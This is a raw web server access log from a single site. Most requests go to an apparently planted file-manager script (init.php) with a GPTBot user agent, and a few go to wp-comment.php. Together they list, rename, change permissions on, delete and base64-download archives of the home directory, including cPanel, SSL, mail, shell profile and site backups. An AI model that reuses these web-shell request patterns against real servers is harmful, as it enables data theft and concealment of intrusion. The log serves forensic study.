74.7.227.14 - - [23/Dec/2025:21:41:10 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=access-logs.tar.gz HTTP/1.1" 200 18923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:11 -0600] "GET /resources/views/layouts/init.php?edit=access-logs.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19020 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:11 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.cphorde.tar HTTP/1.1" 200 18895 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:12 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.cphorde.tar HTTP/1.1" 200 18911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:12 -0600] "GET /resources/views/layouts/init.php?delete=access-logs.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 103325 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:17 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.cphorde.zip HTTP/1.1" 200 18911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:17 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=access-logs.zip HTTP/1.1" 200 18917 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:18 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=access-logs.tar HTTP/1.1" 200 18901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:18 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=access-logs.tar.gz HTTP/1.1" 200 18907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:19 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=access-logs.tar HTTP/1.1" 200 18917 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:19 -0600] "GET /resources/views/layouts/init.php?delete=ssl.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 102257 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:23 -0600] "GET /resources/views/layouts/init.php?edit=logs.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19009 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:24 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=ssl.zip HTTP/1.1" 200 18901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:25 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=mail.zip HTTP/1.1" 200 18903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:25 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=logs.zip HTTP/1.1" 200 18903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:26 -0600] "GET /resources/views/layouts/init.php?edit=logs.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19006 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
80.94.68.138 - - [23/Dec/2025:21:41:26 -0600] "GET /wp-comment.php?fm_settings=true&fm_config_delete=true HTTP/1.1" 302 - "http://www.sardargurjari.com/wp-comment.php?fm_settings=true" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
74.7.227.14 - - [23/Dec/2025:21:41:26 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=tmp.zip HTTP/1.1" 200 18885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
80.94.68.138 - - [23/Dec/2025:21:41:26 -0600] "GET /wp-comment.php?fm_settings=true HTTP/1.1" 200 25452 "http://www.sardargurjari.com/wp-comment.php?fm_settings=true" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
74.7.227.14 - - [23/Dec/2025:21:41:27 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=tmp.tar HTTP/1.1" 200 18885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:27 -0600] "GET /resources/views/layouts/init.php?delete=tmp.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 101194 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:32 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=mail.tar HTTP/1.1" 200 18903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:33 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=mail.tar HTTP/1.1" 200 18887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:33 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=tmp.zip HTTP/1.1" 200 18901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
80.94.68.138 - - [23/Dec/2025:21:41:37 -0600] "GET /wp-comment.php?phpinfo=true HTTP/1.1" 200 108297 "http://www.sardargurjari.com/wp-comment.php?fm_settings=true" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
74.7.227.14 - - [23/Dec/2025:21:41:34 -0600] "GET /resources/views/layouts/init.php?delete=logs.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 100123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:40 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=tmp.tar HTTP/1.1" 200 18901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:40 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=logs.tar HTTP/1.1" 200 18903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:41 -0600] "GET /resources/views/layouts/init.php?delete=mail.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 99050 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:46 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=ssl.zip HTTP/1.1" 200 18885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:47 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=mail.zip HTTP/1.1" 200 18887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:47 -0600] "GET /resources/views/layouts/init.php?edit=mail.zip&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19006 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:48 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvLmJhc2hfcHJvZmlsZS50YXI= HTTP/1.1" 200 2048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:48 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvLnNwYW1hc3Nhc3NpbmVuYWJsZS50YXI= HTTP/1.1" 200 1536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:49 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvLnNwYW1hc3Nhc3Npbi56aXA= HTTP/1.1" 200 39151 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:49 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvLnNwYW1hc3Nhc3Npbi50YXI= HTTP/1.1" 200 41472 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:50 -0600] "GET /resources/views/layouts/init.php?edit=.spamassassinenable.spamassassinenable.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19080 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:50 -0600] "GET /resources/views/layouts/init.php?edit=.bash_profile.bash_profile.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19056 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:51 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.bash_profile.bash_profile.tar.gz HTTP/1.1" 200 18937 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:52 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvLnNwYW1hc3Nhc3Npbi50YXIuZ3o= HTTP/1.1" 200 8124 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:52 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.bash_logout.bash_logout.tar.gz HTTP/1.1" 200 18949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:53 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.bash_logout.bash_logout.tar.gz HTTP/1.1" 200 18933 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:53 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.bash_profile.bash_profile.tar.gz HTTP/1.1" 200 18953 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:54 -0600] "GET /resources/views/layouts/init.php?edit=.spamassassinboxenable.spamassassinboxenable.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19092 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:54 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.spamassassinboxenable.spamassassinboxenable.tar.gz HTTP/1.1" 200 18973 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:55 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.spamassassinboxenable.spamassassinboxenable.tar.gz HTTP/1.1" 200 18989 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:55 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.trash.tar HTTP/1.1" 200 18907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:56 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.trash.tar HTTP/1.1" 200 18891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:56 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.cpanel.tar.gz HTTP/1.1" 200 18899 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:57 -0600] "GET /resources/views/layouts/init.php?edit=.bashrc.bashrc.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19032 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:57 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.bash_profile.tar HTTP/1.1" 200 18905 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:58 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.cphorde.tar.gz HTTP/1.1" 200 18917 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:58 -0600] "GET /resources/views/layouts/init.php?edit=.bash_profile.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 21072 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:41:59 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.bash_profile.tar HTTP/1.1" 200 18921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:00 -0600] "GET /resources/views/layouts/init.php?edit=.bash_logout.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 21070 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:00 -0600] "GET /resources/views/layouts/init.php?edit=public_html.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19026 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:01 -0600] "GET /resources/views/layouts/init.php?edit=mail.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 15338 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:01 -0600] "GET /resources/views/layouts/init.php?edit=.cpanel.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 264461 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:02 -0600] "GET /resources/views/layouts/init.php?edit=ssl.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:02 -0600] "GET /resources/views/layouts/init.php?edit=logs.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19015 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:03 -0600] "GET /resources/views/layouts/init.php?edit=tmp.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:03 -0600] "GET /resources/views/layouts/init.php?edit=.bash_logout.bash_logout.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19052 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:04 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.bashrc.bashrc.tar.gz HTTP/1.1" 200 18929 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:04 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.bashrc.bashrc.tar.gz HTTP/1.1" 200 18913 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:05 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvdG1wLnRhci5neg== HTTP/1.1" 200 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:05 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvc3NsLnRhci5neg== HTTP/1.1" 200 12867 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:06 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvLnJhem9yLnppcA== HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:06 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvLnRyYXNoLnRhcg== HTTP/1.1" 200 3584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
31.13.127.7 - - [23/Dec/2025:21:42:08 -0600] "GET / HTTP/1.1" 200 2429 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
74.7.227.14 - - [23/Dec/2025:21:42:07 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvdG1wLnRhcg== HTTP/1.1" 200 45204992 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:09 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvLnJhem9yLnRhcg== HTTP/1.1" 200 38912 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:10 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvc3NsLnppcA== HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:10 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvc3NsLnRhcg== HTTP/1.1" 200 52224 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:11 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvdG1wLnppcA== HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:11 -0600] "GET /resources/views/layouts/init.php?edit=.spamassassin.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/ HTTP/1.1" 200 19024 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:12 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=.spamassassin.tar HTTP/1.1" 200 18921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:12 -0600] "GET /resources/views/layouts/init.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.spamassassin.tar HTTP/1.1" 200 18905 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:13 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvd3d3LnppcA== HTTP/1.1" 200 151847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:13 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvd3d3LnRhci5neg== HTTP/1.1" 200 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [23/Dec/2025:21:42:14 -0600] "GET /resources/views/layouts/init.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvd3d3LnRhcg== HTTP/1.1" 200 119848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
